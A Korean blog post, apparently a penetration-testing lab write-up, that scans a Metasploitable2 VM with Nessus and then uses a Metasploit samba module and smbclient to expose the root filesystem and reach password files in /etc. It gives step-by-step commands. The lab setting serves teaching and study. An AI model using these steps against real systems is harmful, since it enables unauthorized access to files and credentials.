[3] Nessus를 활용한 Metasploitable2에 대한 samba취약점 해킹
- 2022.08.19 -
해당 블로그의 내용에는 실제로 해킹을 하는 과정이 언급되어 있습니다.
모의 해킹의 환경은 100% 사용자가 통제가 가능한 상황에서 실습을 진행하였으며
불법적인 해킹이 아닌 모의 해킹으로써 해킹의 목적이 오롯이 교육의 성격에 초점이 맞추어져 있으며
본 과정을 악용하여 사용하는 2차 피해에 대해서는 행위자가 법적 책임을 질 수 있으며
일어나는 모든 피해에 대해서는 책임지지 않습니다.
구축 환경
가상 시스템 - 역할 - 운영기반
KALI | Attacker | Debian GNU 10
Metasploitable2 | Victim | Linux
IP 목록
Host - IP Address
KALI | 192.168.206.128
Metasploitable2 | 192.168192.128
시나리오 내용
스캔도구 중 하나인 Nessus를 이용하여 Metasploitable을 스캔하고 네트워크 공유 서비스인 samba취약점을 이용하여
루트단위에 있는 파일 시스템을 링크받아 공유하여 탈취하는 취약점 공격을 시행한다.
실습 환경 - 가상 네트워크 환경
공격자
- OS : Kali Linux
- IP : 192.168.206.128
희생자
- OS : Metasploitable 2
- IP : 192.168.192.128
실습 시작
Nessus를 설치하기 위해서 칼리에서 브라우저를 통해 tenable사이트에 접속하여 네모 박스 View Downloads 클릭
사이트 링크는 여기로!
Nessus 다운로드를 눌러준다.
파일을 열지말고 Save File로 옵션을 변경 후 OK
칼리에서 다운로드 디렉토리로 이동하여 해당 파일을 설치한다.
cd Downloads
ls
sudo dpkg -i Nessus-10.3.0-debian9_amd54.deb
/bin/systemctl start nessusd.service
설치 명령어를 입력하면 빨간색으로 밑줄 친 경로와 그 밑에 접속 주소가 나와있다.
밑줄 친 경로를 그대로 입력하여 서비스를 시작하고 네모박스의 주소를 복사하여 브라우저에서 접속해보자.
설치된 Nessus에서 본격적인 셋업을 시작한다.
가장 맨 위에 있는 Nessus Essentioals를 선택한다.
이름과 성을 쓰고 실제 사용 중인 이메일을 입력해준다.
실제 저 메일로 활성화 코드가 오기 때문이 이 항목만큼은 대충하지말고 진짜 사용중인 메일을 입력하자
엑티베이션 코드가 도착한것을 확인할 수 있다.
위에서 메일을 통해 받은 활성화 코드를 복사하여 코드에 입력한다.
nessus에 접속할 계정을 생성한다.
잊어버리지 않게 쉽게 설정했다.
nessus / nessus
이제 필요한 파일들을 설치한다. 오래걸리니까 마음 편하게 기다리자
진짜오래 걸린다 커피나 다른거라도 하면서 시간을 보내보자..!
My Scans에서 New Scan을 눌러서 새로 생성한다.
Basic Network Scan을 눌러 스캔 유형을 선택
위 목록대로 MSFV2를 입력해준다
마지막의 Targets에서는 Metasploitable2의 IP인 192.168.192.128로 입력한다.
ASSESSMENT 탭에서 스캔 타입을 Scan for known web vulnerablilties로 선택.
다른 옵션들은 선택하지 않고 지정한다.
시작버튼을 눌러서 스캔을 시작한다.
시간이 지나면 점점 취약점과 스캔결과가 쌓이고 있는 것을 확인할 수 있다.
해당 호스트를 누르면 상세하게 결과들을 확인 할 수 있다.
CVSS Score가 크리티컬항목에서 10.0을 기록한것을 확인 할 수 있다.
아! CVSS Score 계산도 할 수 있다 같이 링크를 둘테니 한번 확인이 필요할경우 확인해 보자.
https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator
nessus로도 취약점을 스캔할 수 있지만 100% 자세하게 나오는것이 아니므로 다른 스캔도구를 활용하여 스캔해보자.
sudo rpcinfo -p 192.168.192.128
위 사진에서 보았던 portmapper가 tcp/110번 포트의 취약점이 nessus에서도 확인할 수 있었다.
이제 원래 시나리오대로 돌아와 samba 취약점을 들어가본다.
445번 포트를 사용하는 것을 확인 할 수 있다.
msfdb 를 init명령어로 초기화 하고 msfconsole을 실행한다.
sudo msfdb init
sudo msfconsole
msfconsole 실행 후 명령어를 통해 samba취약점 kit를 찾아준다.
search samba
명령어를 통해서 RHOST, RPORT를 지정해준다.
show options를 통해서 해당 경로가 어떤 포트로 가는지 확인한다 우리가 nessus로 확인한 취약한 포트는 445였다.
지정이 자동으로 되어있지 않으면 RPORT를 445번으로 지정해주자.
set RHOST 192.168.192.128
show options
set RPORT 445
set SMBSHARE tmp
공격을 실행한다!
밑줄의 해당 경로에 root filesystem의 모든 정보들을 링크하였다고 안내하고 그 경로가 적혀있다.
exploit
새로운 터미널을 열고 위에서 복사한 경로로 접속한다.
sudo smbclient //192.168.192.128/tmp
ls
패스워드는 kali.
ls를 통해 rootfs가 있는지 확인한다.
없다면... 뭔가 잘못된거다.
디렉토리를 이동한다
cd rootfs
ls
etc안의 패스워드를 모두 가져올 수 있다.
마 치 며
내일 다음으로 이어서 필요한것들을 더 이어나가봐야 겠다.
취약점 분석하는게 역시 재미가 있는것 같다.
'Red Team > Penetration Testing & CTF' 카테고리의 다른 글
[6] Earth리눅스 취약점 분석 및 모의해킹(w. vulnhub) (0) | 2022.08.27 |
---|---|
[5] docker에 대한 무작위대입공격 모의해킹 (2) | 2022.08.22 |
[4]OpenSSL 취약점을 이용한 Heartbleed 모의해킹 (0) | 2022.08.19 |
[2] hfs 취약점을 이용한 모의해킹 (0) | 2022.08.04 |
[1] OS Command Injection을 이용한 모의 해킹 (0) | 2022.08.04 |
댓글
이 글 공유하기
다른 글
-
[5] docker에 대한 무작위대입공격 모의해킹
[5] docker에 대한 무작위대입공격 모의해킹
2022.08.22 -
[4]OpenSSL 취약점을 이용한 Heartbleed 모의해킹
[4]OpenSSL 취약점을 이용한 Heartbleed 모의해킹
2022.08.19 -
[2] hfs 취약점을 이용한 모의해킹
[2] hfs 취약점을 이용한 모의해킹
2022.08.04 -
[1] OS Command Injection을 이용한 모의 해킹
[1] OS Command Injection을 이용한 모의 해킹
2022.08.04